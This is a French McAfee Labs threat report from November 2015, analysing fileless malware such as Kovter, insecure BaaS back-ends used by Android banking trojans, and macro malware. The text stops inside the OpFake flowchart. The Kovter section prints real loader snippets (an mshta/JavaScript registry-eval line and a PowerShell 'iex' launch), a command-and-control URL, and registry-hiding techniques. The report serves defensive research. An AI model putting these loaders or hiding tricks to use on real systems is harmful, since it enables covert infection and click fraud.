Rapport de McAfee Labs sur le paysage des menaces Novembre

Transcription

Rapport
Rapport de McAfee Labs
sur le paysage des menaces
Novembre 2015
McAfee Labs recense
327 nouvelles
menaces par
minute, soit plus de
5 par seconde.
À propos de McAfee Labs
Introduction
McAfee Labs est l'une des équipes les plus éminentes au
monde en matière de recherche et de cyberveille sur les
menaces. Ses orientations stratégiques dans le domaine de
la cybersécurité font autorité. Grâce à des données sur les
principaux vecteurs de menaces (fichiers, Web, messagerie
et réseau) recueillies à partir de millions de sondes,
McAfee Labs fournit une cyberveille en temps réel sur
les menaces, des analyses critiques et des avis d'experts
qui contribuent à améliorer les protections informatiques
tout en réduisant les risques.
Cet automne, McAfee Labs n'a pas chômé.
McAfee fait désormais partie d'Intel Security.
www.mcafee.com/fr/mcafee-labs.aspx
En octobre, nous avons publié le rapport Les données au
cœur d'une économie souterraine, qui s'intéresse au sort des
données volées après leur compromission et aux multiples
possibilités de profit qu'offrent ces informations. Il illustre
également par de nombreux exemples à quoi ressemblent
ces marchés noirs pour données volées et explique la valeur
associée à certains types d'informations.
En novembre, nous avons publié le rapport McAfee Labs
Prévisions 2016 en matière de menaces. Cette édition aborde
l'avenir de la cybersécurité selon deux perspectives différentes.
■■
Suivre McAfee Labs
■■
Nous avons commencé par interroger 21 experts
d'Intel Security, qui nous ont livré leur point de vue
sur l'avenir du paysage des cybermenaces et sur les
mesures que prendra vraisemblablement le secteur
de la sécurité informatique pour y faire face au
cours des cinq prochaines années. Nous les avons
invités à se projeter en avant pour prédire l'évolution
des cyberpirates, de leurs comportements et de
leurs cibles, et la riposte probable de notre secteur
à l'horizon 2020.
Dans la seconde partie, nous avons poussé plus loin
notre analyse et formulé des prévisions plus précises
sur l'activité attendue en 2016 concernant un large
éventail de menaces. Celles-ci vont des logiciels de
demande de rançon (ransomware) aux attaques ciblant
les automobiles ou les infrastructures critiques, jusqu'à
l'entreposage et la vente de données volées.
Rapport de McAfee Labs sur le paysage des menaces, novembre 2015 | 2
À peu près au même moment, nous avons participé à la
rédaction d'un rapport de la Cyber Threat Alliance, un
groupe réunissant plusieurs éditeurs de solutions de
sécurité de premier plan dont l'objectif est de partager la
cyberveille sur les menaces au profit de tous leurs clients.
Ce rapport intitulé Lucrative Ransomware Attacks: Analysis
of the CryptoWall Version 3 Threat (Des attaques de
ransomware très lucratives : analyse de la menace CryptoWall
version 3) est le fruit de plusieurs mois d'analyses techniques
menées conjointement par Intel Security, Symantec, Palo
Alto Networks et Fortinet. Il décortique la famille CryptoWall
version 3 qui a rapporté plus de 325 millions de dollars
en rançons à ses auteurs. Les menaces, les tactiques et les
indicateurs de compromission étudiés dans ce rapport ont
été partagés par tous les membres de l'alliance et avec la
communauté open source. C'est sans doute une première
dans le secteur de la sécurité informatique.
Pour couronner le tout, nous avons également organisé
cinq ateliers pratiques, deux présentations techniques
poussées et trois séances de discussion lors de la
Conférence sur la sécurité FOCUS 15 d'Intel Security.
Les présentations de McAfee Labs se sont intéressées
à un large éventail de sujets, depuis les dernières
tendances en matière d'attaques ciblées jusqu'aux
opérations de démantèlement menées par les forces de
l'ordre de plusieurs pays avec le concours de McAfee Labs.
Pour clôturer l'année en beauté, nous publions à présent
le Rapport de McAfee sur le paysage des menaces —
Novembre 2015. L'édition de ce trimestre propose
trois articles :
■■
■■
■■
Le premier s'intéresse à l'émergence d'une nouvelle
génération de logiciels malveillants sans fichier,
qui échappent à la détection en se dissimulant
dans le Registre Windows et en effaçant toute
trace d'infection du système de fichiers.
Nous nous penchons ensuite sur les mauvaises
pratiques de codage en matière de sécurité des
applications mobiles dans le cloud, et le non-respect
des consignes des fournisseurs de services de
back-end : deux carences qui peuvent entraîner une
exposition des données utilisateur dans le cloud.
Le troisième article traite du retour des logiciels
malveillants diffusés par macro, principalement sous
la forme de campagnes de spam sophistiquées et de
macros intelligentes qui restent cachées même après
avoir téléchargé leur charge active.
À noter aussi…
En plus de mener de nombreuses études sur les menaces,
McAfee Labs met au point des technologies fondamentales
qui seront intégrées aux produits Intel Security. Nous
sommes très heureux de vous annoncer qu'au cours de
récents tests indépendants, les produits de sécurité pour
terminaux de notre entreprise ont réalisé leurs meilleures
performances à ce jour. Les scores de protection obtenus
étaient parfaits. Ces excellents résultats sont à mettre
au compte des améliorations constamment apportées
à McAfee GTI (dont la cyberveille alimente les produits de
sécurité pour terminaux d'entreprise) et de l'optimisation
des performances des fichiers DAT. Bravo à l'équipe de
développement de McAfee Labs !
Chaque jour, nous en apprenons un peu plus sur les
données et le trafic générés par McAfee Global Threat
Intelligence. Le tableau de bord dans le cloud de McAfee GTI
nous permet de détecter et d'analyser des modèles
d'attaques réelles, de façon à ce que nos clients bénéficient
d'une protection plus efficace. Ces informations offrent un
tableau très complet des volumes d'attaques subies par nos
clients. Voici un bref aperçu de la situation au 3e trimestre :
■■
■■
■■
■■
■■
Plus de 44,5 milliards de requêtes par jour reçues
en moyenne par McAfee GTI
Plus de 7,4 millions de tentatives par heure
(via e-mails, recherches Internet, etc.) incitant les
clients à se connecter à des URL dangereuses
Plus de 3,5 millions de fichiers infectés par heure
identifiés dans les réseaux des clients
7,4 millions de tentatives d'installation ou de
démarrage de programmes potentiellement
indésirables par heure
2,2 millions de tentatives de connexions réseau
depuis ou vers des adresses IP dangereuses par heure
Les commentaires que nous recevons de nos lecteurs
à propos de nos Rapports sur le paysage des menaces
nous sont toujours très utiles. Si vous souhaitez nous faire
part de vos impressions au sujet de cette édition, cliquez ici
pour participer à une petite enquête qui ne vous prendra
pas plus de cinq minutes.
— Vincent Weafer, Vice-Président Directeur, McAfee Labs
Comme d'habitude, la deuxième partie du rapport présente
nos statistiques trimestrielles sur les menaces.
Partager ce rapport
Sommaire
Rapport de McAfee Labs
sur le paysage des menaces
Novembre 2015
Ce rapport a été préparé et rédigé par :
Carlos Castillo
Diwakar Dinkar
Paula Greve
Suriya Natarajan
François Paget
Eric Peterson
Arun Pradeep
Avelino Rico
Craig Schmugar
Rakesh Sharma
Rick Simon
Dan Sommer
Bing Sun
Chong Xu
Résumé
5
Points marquants 7
La furtivité croissante des logiciels malveillants
sans fichier
Les chevaux de Troie bancaires sur mobiles livrent
leurs secrets dans le cloud
8
16
Le retour des logiciels malveillants diffusés par macro 34
Statistiques sur les menaces
48
Résumé
La furtivité croissante des logiciels malveillants sans fichier
Les logiciels malveillants sans
fichier échappent à la détection
en limitant ou en éliminant
l'enregistrement de fichiers
binaires sur disque. Les plus
récents d'entre eux ne laissent
aucune trace sur le disque, ce
qui complique considérablement
leur détection.
Ces dernières années, les auteurs de logiciels malveillants ont mis au point de
nouvelles méthodes pour échapper à la détection en se cachant dans la pile
système. Les systèmes de détection en place sont mis à mal par des techniques
qui renforcent l'efficacité des attaques, telles que le polymorphisme, les fonctions
de surveillance, la révocation des autorisations, etc. Plus récemment, les
cybercriminels ont conçu des logiciels malveillants qui utilisent des fonctions
comme l'infrastructure de gestion Windows (WMI, Windows Management
Instrumentation) et Windows PowerShell pour lancer des attaques sans
enregistrer de fichier sur disque.
Bien qu'aucun fichier ne signale leur présence, les infections résidentes en
mémoire sont depuis longtemps connues des experts en sécurité informatique.
Par le passé, les infections déposaient toujours un petit fichier binaire à un
emplacement du disque, mais les dernières techniques de contournement
utilisées par les logiciels malveillants sans fichier (p. ex. Kovter, Powelike et
XswKit) ne laissent aucune trace sur le disque. Cette nouvelle méthodologie
complique singulièrement la détection dans la mesure où celle-ci se base
généralement sur la présence de fichiers statiques sur disque.
Les chevaux de Troie bancaires sur mobiles livrent leurs secrets dans
le cloud
Certains développeurs
d'applications mobiles ne
respectent malheureusement
pas les consignes de leurs
fournisseurs de services de
back-end, exposant ainsi les
informations des clients à des
attaques. Les applications mobiles,
tant légitimes que malveillantes,
reposent souvent sur des services
de back-end mal sécurisés.
Les développeurs d'applications mobiles concentrent la majeure partie de leurs
ressources de développement sur l'interaction de l'application avec l'utilisateur.
Ils dépendent par contre des fournisseurs de services de back-end pour gérer
les informations stockées dans le cloud.
Or, si la plupart d'entre eux offrent des fonctionnalités de sécurité pour protéger les
données hébergées dans leur infrastructure, McAfee Labs, en collaboration avec
des chercheurs indépendants, a découvert qu'en général, l'implémentation et la
configuration par défaut de ces services ne sont pas suffisamment sécurisées —
ce qui ouvre la porte aux accès non autorisés aux données stockées dans le cloud.
Siegfried Rasthofer de la Technische Universität Darmstadt et Eric Bodden
de l'Institut Fraunhofer SIT ont, avec l'assistance de McAfee Labs, mené une
enquête sur trois importants fournisseurs de services de back-end. Au terme
de l'analyse d'environ deux millions d'applications, ils ont identifié 56 millions
d'enregistrements de données non protégés. Les chercheurs ont découvert
des informations sensibles, dont des noms complets, des adresses e-mail, des
mots de passe, des photos, des transactions financières et même des dossiers
médicaux, susceptibles d'être exploités à des fins d'usurpation d'identité,
d'envoi de spam, de distribution de logiciels malveillants et plus encore.
Cela étant, comme les attaquants ne respectent pas non plus les meilleures
pratiques de sécurité en matière de codage, nous avons tourné la situation
à notre avantage. Nous avons analysé 294 817 applications mobiles truffées
de logiciels malveillants et nous en avons identifié 16 dont la sécurité du backend laissait à désirer. Ensuite, nous nous sommes concentrés sur deux chevaux
de Troie bancaires sur mobiles, Android/OpFake et Android/Marry, afin de
décortiquer leur comportement en matière de vol de données et d'argent.
Partager ce rapport
Le retour des logiciels malveillants diffusés par macro
Les logiciels malveillants
diffusés par macro font leur
retour après une longue éclipse.
Les campagnes les plus réussies
distribuent ces nouvelles macros
intelligentes via des documents
joints à des e-mails de spam
sophistiqués. Ces macros restent
cachées même après avoir
téléchargé leur charge active.
Dans les années 90, les logiciels malveillants diffusés par macro tels que Melissa
et WM.Concept ont fait des ravages jusqu'à ce que les développeurs de logiciels,
essentiellement Microsoft, prennent des mesures pour réduire leur efficacité. Après
une éclipse de plusieurs années, les macros malveillantes refont leur apparition.
La plupart des particuliers sont à l'abri de telles menaces dans la mesure où
ils utilisent peu les macros. En revanche, les grandes entreprises y ont souvent
recours pour créer facilement des programmes destinés à traiter des tâches
répétitives. Actuellement, les développeurs de logiciels malveillants diffusés par
macro utilisent des techniques d'ingénierie sociale courantes pour s'attaquer aux
entreprises, avec le concours involontaire de leurs utilisateurs.
Cette nouvelle génération de malware s'introduit généralement dans les réseaux
d'entreprise à la suite de campagnes de spam sophistiquées qui tirent parti des
informations collectées grâce à l'ingénierie sociale pour se donner l'apparence
de la légitimité. Ces nouvelles macros intelligentes restent cachées même après
avoir téléchargé leur charge active.
Partager ce rapport
Points marquants
La furtivité croissante des logiciels
malveillants sans fichier
Les chevaux de Troie bancaires sur
mobiles livrent leurs secrets dans
le cloud
Le retour des logiciels malveillants
diffusés par macro
Donner votre avis
Points marquants
La furtivité croissante des logiciels
malveillants sans fichier
— Arun Pradeep et Suriya Natarajan
Les techniques d'infiltration et de persistance utilisées par les logiciels
malveillants ne cessent d'évoluer. Ces dernières années, les auteurs de logiciels
malveillants ont mis au point de nouvelles méthodes pour échapper à la
détection en se cachant dans la pile système. Les systèmes de détection en
place sont mis à mal par des techniques qui renforcent l'efficacité des attaques,
telles que le polymorphisme, les fonctions de surveillance, la révocation
des autorisations, etc. Plus récemment, les cybercriminels ont conçu des
logiciels malveillants qui utilisent des fonctions comme l'infrastructure de
gestion Windows (WMI, Windows Management Instrumentation) et Windows
PowerShell pour lancer des attaques sans enregistrer de fichier sur disque.
Les infections sans fichier résidentes en mémoire sont depuis longtemps
connues des experts en sécurité informatique. Par le passé, même lorsqu'elles
étaient qualifiées d'infections « sans fichier », les menaces déposaient toujours
un petit fichier binaire quelque part sur le disque. Par contre, les dernières
techniques de contournement utilisées par les logiciels malveillants sans fichier
(p. ex. Kovter, Powelike et XswKit) ne laissent aucune trace sur le disque. Cette
nouvelle méthodologie complique singulièrement la détection dans la mesure
où celle-ci se base généralement sur la présence de fichiers statiques sur disque.
Les logiciels malveillants sans fichier ont connu un réel essor à la fin de
l'année 2014 et début 2015. Au cours des trois premiers trimestres de l'année,
McAfee Labs a détecté 74 471 échantillons relevant de trois grandes familles
de logiciels malveillants sans fichier. Les mesures de protection développées
contre certaines de ces nouvelles familles ont contribué à réduire le nombre
d'échantillons, mais ils perdurent.
Tendance des logiciels malveillants sans fichier
20 000
18 000
16 000
14 000
12 000
10 000
8 000
6 000
4 000
2 000
0
Janv.
Févr.
Mars
Avr.
Mai
Juin
2015
Juil.
Août
Sept.
Oct.
Partager ce rapport
Points marquants
Types de logiciels malveillants sans fichier
Les logiciels malveillants qui infectent un système sans laisser de trace de leur
exécution sur disque portent le nom de logiciels malveillants sans fichier. Ils sont
généralement de trois types :
■■
■■
■■
Résident en mémoire : Ce type de logiciel malveillant sans fichier utilise
l'espace mémoire d'un fichier Windows légitime. Il charge son code dans
cet espace mémoire et y réside jusqu'à ce qu'il soit accédé ou activé.
Bien que l'exécution intervienne au sein de l'espace mémoire du fichier
légitime, il existe un fichier physique dormant qui initie ou redémarre
l'exécution. Par conséquent, ce type de logiciel malveillant n'est pas
complètement « sans fichier ».
Rootkit : Certains logiciels malveillants sans fichier dissimulent leur
présence derrière une API utilisateur ou noyau. Un fichier est présent
sur le disque mais en mode furtif. Ici aussi, on ne peut pas vraiment
parler de logiciel malveillant « sans fichier ».
Registre Windows : Certains types de logiciels malveillants récents
résident dans le Registre du système d'exploitation Microsoft Windows.
Leurs auteurs ont exploité des fonctionnalités tel le cache de miniatures
Microsoft, utilisé afin de stocker des images pour l'affichage Miniatures
de l'Explorateur Windows. Le cache de miniatures offre au logiciel
malveillant un mécanisme de persistance.
Les logiciels malveillants sans fichier doivent toujours pénétrer dans le
système de la victime via un fichier binaire statique. La plupart d'entre eux
utilisent l'e-mail comme vecteur. Dès que l'utilisateur clique sur la pièce
jointe, le logiciel malveillant écrit l'intégralité du fichier de la charge active
sous une forme chiffrée dans une ruche du Registre Windows. Ensuite,
il s'autodétruit pour disparaître du système.
Très intelligemment conçues, les familles de logiciels malveillants sans fichier
comme Kovter, Powelike et XswKit peuvent exécuter des attaques du Registre
Windows sans le moindre fichier et sans laisser aucune trace dans le système de
fichiers. Bien que leurs auteurs préparent l'environnement destiné à lancer ces
attaques en exécutant du code dans un fichier, ce dernier s'autodétruit dès que
le système est prêt pour l'attaque malveillante.
Partager ce rapport
Points marquants
Organigramme d'une infection par logiciel malveillant sans fichier
Campagne de spam
Injecteur de virus
Sites web
malveillants
crée
Clé de Registre Run
avec JavaScript
Entrée de Registre
du cache de miniatures
exécute
exécute
Powershell
exécute le script
chiffré
Charge active
malveillante
Exécution du code malveillant
dans la mémoire de
processus légitimes
Source : McAfee Labs, 2015
Techniques utilisées pour dissimuler des infections sans fichier
Kovter et Powelike écrivent le script JavaScript et la charge active chiffrée
dans une ruche du Registre et révoquent l'autorisation utilisateur sur les clés
associées, non seulement pour se cacher des produits de sécurité mais aussi
pour empêcher tout accès utilisateur. Cette famille de malware utilise deux
techniques pour rester invisible à l'utilisateur : le masquage et l'utilisation
d'un caractère nul.
Masquage : Le malware sans fichier masque les entrées du Registre soit en
révoquant la liste de contrôle d'accès (ACL), soit en ajoutant un caractère nul
dans le nom de la valeur du Registre.
Une ACL ou liste de contrôle d'accès est une liste de mesures de protection
appliquées à un objet. Par objet, on entend un fichier, un processus, un
événement ou tout autre élément associé à un descripteur de sécurité.
Dans ce cas-ci, l'entrée du Registre est l'objet dont les autorisations ACL
sont révoquées par le logiciel malveillant sans fichier, ce qui empêche
l'utilisateur d'accéder à l'élément malveillant du Registre.
Partager ce rapport
Points marquants
Utilisation d'un caractère nul dans le nom d'une valeur du Registre : Une autre
technique simple mais efficace utilisée par les attaquants consiste à inclure un
ou plusieurs caractères nuls dans le nom d'une valeur du Registre. L'éditeur du
Registre Windows ne peut pas afficher des entrées, par exemple des clés, des
données ou des valeurs, lorsqu'elles comportent un caractère nul. Le logiciel
malveillant écrit le fichier chiffré complet dans une clé dont le nom commence
par un caractère nul. En cas de tentative d'accès à la clé créée par le logiciel
malveillant, le message d'erreur suivant s'affiche dans l'éditeur du Registre :
Message d'erreur affiché lors de l'accès à une clé de Registre contenant un caractère nul
Exécution des logiciels malveillants sans fichier
Les auteurs de ces menaces ont soigneusement choisi les applications
légitimes du système d'exploitation Windows censées exécuter leurs fichiers
binaires. Deux applications Windows sont utilisées pour l'exécution des
logiciels malveillants sans fichier, à savoir l'infrastructure de gestion Windows
(WMI, Windows Management Instrumentation) et PowerShell :
Infrastructure de gestion Windows (WMI) : WMI est l'implémentation Microsoft
de WBEM (Web-Based Enterprise Management), une initiative visant à développer
une technologie standard pour accéder aux informations de gestion dans un
environnement d'entreprise. Cet utilitaire Microsoft peut être utilisé par un logiciel
malveillant sans fichier pour exécuter des scripts JavaScript malveillants.
PowerShell : Windows PowerShell est un cadre de gestion de la configuration
et de l'automatisation des tâches développé par Microsoft. Il comprend un shell
de ligne de commande et un langage de script associé basé sur .NET Framework.
Une charge active malveillante chiffrée au format Base64 est écrite dans le
Registre, puis exécutée à l'aide d'un script PowerShell.
L'exemple suivant illustre une fonction de logiciel malveillant sans fichier
déchiffrée et codée dans la clé de Registre qui appelle le fichier exécutable
PowerShell pour exécuter le code de la charge active chiffrée.
Ly9oS6=TN25.Run("C:\\Windows\\System32\\WindowsPowerShell\\
v1.0\\powershell.exe iex $env:csnvjgc",0,1)
Partager ce rapport
Points marquants
Analyse de Kovter par McAfee Labs
Les familles de logiciels malveillants sans fichier les plus répandues utilisent
diverses clés de Registre exécutées automatiquement pour infecter le système.
Elles stockent leur charge active complète dans des clés personnalisées,
généralement invisibles à l'utilisateur. La plupart des variantes de ce type de
menaces ciblent les injections via les champs de recherche, les fraudes aux clics
publicitaires et l'identification des informations système.
L'injecteur principal de Kovter crée un environnement pour l'infection complète.
Une clé de Registre Run contenant un script JavaScript est créée avec un nom de
valeur incluant un caractère nul. Or, il est impossible pour l'utilisateur d'accéder
à un nom de valeur comportant un caractère nul.
Nom de valeur de Registre contenant un caractère nul
La valeur de la clé de Registre Run pointe vers une autre clé de Registre contenant
le script malveillant destiné à charger la fonction de surveillance et la charge active.
L'exemple suivant illustre la valeur de la clé de Registre qui pointe vers une autre clé
de Registre sous l'entrée HKCU\Software.
mshta javascript:wnd1w7pRy="X";yg2=new%20
ActiveXObject("WScript.Shell");COlM2JWez="pKiLSI";Vr0AD6=yg2.
RegRead("HKCU\\software\\3cf540da\\
e925fae2");YJa6FFTM="0nl0";eval(Vr0AD6);ASC7rr9Oj="hAzrr";
Dans l'illustration suivante, le script JavaScript dans la clé de Registre HKCU\
Software est chiffré et masqué.
Charge active et code de surveillance chiffrés écrits dans le Registre
Partager ce rapport
Points marquants
Le code JavaScript suivant est le résultat de l'exposition du code de premier
niveau, lequel contient le shellcode codé au format Base64.
Shellcode chiffré en Base64
Le décodage du shellcode en Base64 permet de voir le script PowerShell chargé
d'exécuter le code malveillant et le script de la fonction de surveillance.
Script PowerShell en Base64 déchiffré
Exécution du script PowerShell
Le script PowerShell exécute le code malveillant dans la mémoire des systèmes
de fichiers légitimes pour rester en mémoire sans être détecté.
■■
Regsvr32.exe
■■
Svchost.exe
■■
Dllhost.exe
Dès que le code PowerShell est exécuté, le logiciel malveillant établit une
connexion avec son serveur de contrôle.
■■
hxxp://185.5.250.230/upload.php
Il collecte ensuite une pléthore d'informations sur la machine hôte et effectue
une série d'actions.
■■
■■
Il collecte différentes informations système, dont la version du système
d'exploitation, le Service Pack et l'architecture (32 ou 64 bits).
Il recherche .NET Framework, Adobe Flash Player et la dernière version
du navigateur.
Partager ce rapport
Points marquants
Informations collectées par Kovter à propos du système infecté
Nom
Valeur
Description
Mode
1
Action à exécuter
sur l'hôte
UID
5BD39AA1CAF61D76
ID utilisateur
OS
Win 7, SP1 IL:3
Version du système
d'exploitation et
Service Pack
OS bits
x32
Architecture du chipset
V
2.0.3.5
Version du logiciel
malveillant
aff_id
610
ID du nœud affecté
Oslang
ENU
Langue du système
d'exploitation
GMT
GMT +05:30
Fuseau horaire
Threads
0
Nombre de threads
en cours d'exécution
Online
355
Nombre d'infections
actives
Total RAM
2047
Capacité de la
mémoire RAM
Load RAM
0
RAM utilisée par le
logiciel malveillant
Free RAM
1404
RAM libre disponible
CPU Load
7
Charge du processeur
Antispyware
Windows Defender
Programme de
sécurité installé
Le code exécuté en mémoire analyse les ressources du système et reçoit
des informations de son serveur de contrôle de façon dynamique, ce qui lui
permet de manipuler l'attaque sans affecter l'utilisateur et sans être détecté.
Plus l'ordinateur est puissant et possède de ressources, plus le trafic observé
sur le réseau est important.
Kovter met également en œuvre des techniques pour échapper aux tentatives de
neutralisation des chercheurs en sécurité. Il détermine si l'hôte est une machine
virtuelle ou s'il possède des solutions antimalware et des outils de surveillance.
Parmi les informations collectées sur l'hôte, citons les suivantes :
■■
&antivirus=McAfee VirusScan Enterprise
■■
AntiWireShark
■■
&antidetect=AntiVMware
Points marquants
Le logiciel malveillant sans fichier recherche la présence d'applications spécifiques.
S'il ne les trouve pas, il les télécharge et les installe sur le système de la victime.
Découvrez comment Intel
Security peut vous aider à vous
protéger contre cette menace.
■■
.NET Framework
■■
Adobe Flash Player
■■
Dernière version du navigateur Internet Explorer
Ces applications sont nécessaires pour pouvoir accéder aux sites web contenant
des publicités Flash et pour cliquer sur celles-ci à l'insu de l'utilisateur.
Une fois son évaluation du système terminée, Kovter prépare un navigateur
pour balayer toutes les pages d'un site web et cliquer sur toutes les publicités.
Le serveur de contrôle transmet dynamiquement des sites hébergeant des
publicités sur lesquelles le logiciel malveillant clique de façon aléatoire.
À ce stade, le système infecté est devenu un véritable robot à clics frauduleux.
Fraude aux clics
Kovter contient des chaînes de recherche programmées en dur et utilisées
pour remplir des pages web hébergeant des publicités connexes, sur lesquelles
le logiciel malveillant clique aléatoirement à l'aide du code intégré. La fraude aux
clics est très lucrative pour l'attaquant qui tire parti du modèle publicitaire basé
sur le paiement au clic. Celui-ci permet à l'annonceur de rémunérer l'éditeur du
site web à chaque clic de sa publicité. Plus le nombre de clics est élevé, plus les
profits sont importants.
Ces fraudeurs ne s'en tiennent pas là. Il semble qu'ils se soient également
associés à des auteurs de logiciels de demande de rançon (ransomware).
Certaines variantes de Kovter analysées par McAfee Labs ont téléchargé
des charges actives supplémentaires appartenant à la famille CryptoWall.
Nous n'avons constaté aucun vol d'informations par Kovter. Son seul but
est apparemment d'infiltrer le système de la victime et de le transformer
en robot à clics.
Détection de la menace par les technologies de sécurité
Dans le cas d'un logiciel malveillant sans fichier, une détection basée sur les
fichiers, les dossiers ou d'autres éléments statiques du système cible n'est
généralement pas possible car cette menace ne laisse aucune trace permanente.
En outre, comme aucun processus indépendant n'est en cours d'exécution
dans la mémoire, une détection basée sur les processus est tout aussi
inefficace. Une détection reposant sur l'accès utilisateur au Registre n'est pas
toujours possible non plus, puisque l'accès utilisateur est souvent révoqué par
l'utilisation de caractères nuls dans les valeurs des clés de Registre. Qui plus est,
le chiffrement des valeurs des clés de Registre est parfois dynamique. Dès lors,
la détection statique d'une clé de Registre infectée échoue également.
Puisqu'aucune application ou vulnérabilité spécifique n'est visée, les mises à jour
Windows ou les correctifs d'application n'empêchent pas les utilisateurs d'être
victimes de ce type d'attaque.
Comme la source de l'infection est généralement l'e-mail ou un site web
malveillant, une navigation sécurisée et le respect de bonnes pratiques en
matière d'e-mails restent les deux meilleures défenses. Les technologies de
protection de la messagerie électronique et de l'environnement web aideront
les utilisateurs à se protéger du vecteur d'attaque initial de ce type de menace,
qui inclut toujours un fichier joint. Certaines technologies de protection des
terminaux sont suffisamment intelligentes pour détecter les logiciels malveillants
sans fichier. Enfin, la technologie de détection basée sur les comportements
devrait être encore plus efficace dans l'interception de telles menaces.
Pour découvrir comment les produits de sécurité Intel Security détectent les
logiciels malveillants sans fichier, cliquez ici.
Partager ce rapport
Points marquants
Les chevaux de Troie bancaires sur mobiles
livrent leurs secrets dans le cloud
— Carlos Castillo
Pratiquement toutes les applications mobiles sont connectées à Internet, ce
qui augmente la disponibilité des données sur les différents équipements et
plates-formes. En cas de panne ou de remplacement de l'appareil mobile, il est
généralement possible de restaurer les données des applications à partir du cloud.
Toutefois, le stockage et la gestion à distance des données des applications
mobiles peuvent coûter cher et prendre du temps. Au lieu de se concentrer
exclusivement sur le développement de l'application elle-même, les développeurs
consacrent du temps et de l'argent à concevoir et à tester la partie back-end de
l'application dans le cloud, ce qui nécessite des connaissances spécifiques en
matière de bases de données et de langages de programmation côté serveur.
Données personnelles collectées par les applications mobiles et stockées dans le back-end
Source : https://www.sit.fraunhofer.de/fileadmin/bilder/presse/appdatathreat_pressebild.jpg
Pour pallier le problème, des sociétés Internet comme Amazon, Google et Facebook
proposent des services de back-end entièrement gérés, faciles à implémenter et
prêts à l'emploi : les services BaaS, ou Backend-as-a-Service. Ces services offrent
un stockage et une gestion des données sécurisés pour les applications web et
mobiles. La plupart des fournisseurs BaaS offrent des fonctionnalités de sécurité
pour protéger les données hébergées dans leur infrastructure. McAfee Labs,
en collaboration avec des chercheurs indépendants, a toutefois constaté qu'en
général, l'implémentation et la configuration de ces services par les développeurs
d'applications mobiles ne sont pas suffisamment sécurisées — ce qui ouvre la
porte aux accès non autorisés aux données stockées dans le cloud.
Partager ce rapport
En mars dernier, Siegfried Rasthofer de la Technische Universität Darmstadt et
Eric Bodden de l'Institut Fraunhofer SIT ont, avec l'assistance de McAfee Labs,
mené une enquête sur deux millions d'applications mobiles connectées
à trois importants fournisseurs de services BaaS (Facebook Parse, CloudMine et
Amazon AWS). À cette occasion, ils ont identifié 56 millions d'enregistrements de
données non protégées. Les chercheurs sont parvenus à accéder aux bases de
données dans le cloud à partir de plusieurs applications légitimes et découvert
des informations sensibles — dont des noms complets, des adresses e-mail, des
mots de passe, des photos, des transactions financières et même des dossiers
médicaux susceptibles d'être exploités à des fins d'usurpation d'identité, d'envoi
de spam, de distribution de logiciels malveillants et plus encore. (Au lieu de
divulguer publiquement le nom de ces développeurs d'applications, les
chercheurs les ont avertis personnellement pour protéger les informations des
clients.) Même si les fournisseurs de services BaaS proposent des instructions
pour implémenter leurs services en toute sécurité, il apparaît clairement que
certains développeurs ne les ont pas respectées.
Points marquants
Par exemple, l'une des recommandations de sécurité les plus importantes
pour un fournisseur de service BaaS consiste à manipuler les enregistrements
(les lire, les mettre à jour ou les supprimer) via d'autres canaux, dont les
interfaces web d'administration, et non l'application elle-même.
Cette consigne a toute sa raison d'être dans la mesure où, par défaut, l'accès aux
données est uniquement sécurisé par une clé « secrète » qui est incorporée dans
l'application lorsqu'elle est distribuée à un utilisateur. Elle est donc accessible
à quiconque possédant un minimum de connaissances techniques et capable de
l'extraire en décompilant l'application ou en effectuant une recherche de chaîne.
Les clés propres aux utilisateurs codées en dur dans les applications mobiles
peuvent être interceptées, rendant ainsi risquée la manipulation des données
de cloud directement par l'application.
Source : https://www.virusbtn.com/pdf/conference_slides/2015/Huber-etal-VB2015.pdf
Utilisation mal sécurisée des services BaaS de Facebook Parse par
les chevaux de Troie bancaires sur mobiles
Si les applications légitimes ne respectent pas ces consignes de sécurité
et exposent ainsi des millions d'enregistrements clients, qu'en est-il des
applications mobiles malveillantes qui utilisent les fournisseurs BaaS pour
assurer leurs services de back-end ? Est-il possible qu'eux non plus ne
respectent pas les bonnes pratiques de sécurité requises et s'exposent ainsi
au regard scrutateur des chercheurs en sécurité ?
En juillet, en collaboration avec Siegfried Rasthofer et Eric Bodden, McAfee Labs
a analysé 294 817 échantillons d'applications mobiles truffées de logiciels
malveillants. Leur constat était que 16 d'entre elles se connectaient à des
instances BaaS vulnérables, implémentées dans l'outil Facebook Parse.
McAfee Labs a découvert que neuf applications pouvaient accéder à des tables
de la base de données dans le cloud (NewTasks, SmsReceiver et TaskManager),
ce qui a conduit les chercheurs à penser que le service BaaS était également
Partager ce rapport
Points marquants
utilisé comme serveur de contrôle. Ils ont identifié cinq comptes Facebook
Parse compromis et utilisés par deux familles de chevaux de Troie mobiles
apparentées : Android/OpFake et Android/Marry.
SMiShing : Attaques de phishing
par SMS.
Pour comprendre comment ces menaces exploitent les services BaaS et quels
types d'informations sont stockées dans le cloud, nous avons décompilé une
variante de la famille de malware Android/OpFake, moins complexe, que nous
avons ensuite soumise à une analyse statique. L'application malveillante,
vraisemblablement distribuée via des attaques de SMiShing, se fait passer
pour un programme d'installation (Установка) de l'application de messagerie
instantanée russe légitime Чат для друзей. ДругВокруг (Chat for Friends) :
Android/OpFake se faisant passer pour une application de messagerie instantanée russe
Lorsque l'application malveillante est exécutée, un message fictif s'affiche
à l'écran pour avertir l'utilisateur que l'application va être téléchargée et
installée sur l'appareil :
Faux message affiché par Android/OpFake
Partager ce rapport
Points marquants
Toutefois, au lieu de faire ce qu'annonce l'interface utilisateur, le malware
dissimule l'icône dans l'écran d'accueil et démarre un service en arrière-plan
qui abonne l'appareil aux notifications push de l'outil Facebook Parse, transmet
des informations sur celui-ci au serveur de contrôle Facebook Parse ainsi qu'au
serveur de contrôle traditionnel (non BaaS) et, enfin, planifie une alarme système :
Le téléphone
sonne
Application exécutée
Canaux :
• D-<ID_terminal>
• « Tout le monde »
• Pays (ISO SIM)
• « Bienvenue »
Abonnement
aux notifications
Push Parse
Enregistrement
des informations
d'installation Parse
• IMEI
• Pays de la carte SIM
• Opérateur de la
carte SIM
• Numéro de téléphone
• API
• Marque
• Modèle
• is_worked (vrai)
• worked_task
(vrai)
• is_root
Démarrage
terminé
Démarrage du
service principal
Masquage de l'icône
Enregistrement local
de l'URL du serveur
de contrôle principal
Fin
Exécution des tâches
asynchrones
Transfert des informations
du terminal vers le serveur
de contrôle /bn/reg.php
Planification de
l'alarme système
•
•
•
•
IMEI
Pays de la carte SIM
Numéro de téléphone
Opérateur de la
carte SIM
• Solde
Exécution du récepteur
de contenu toutes
les minutes
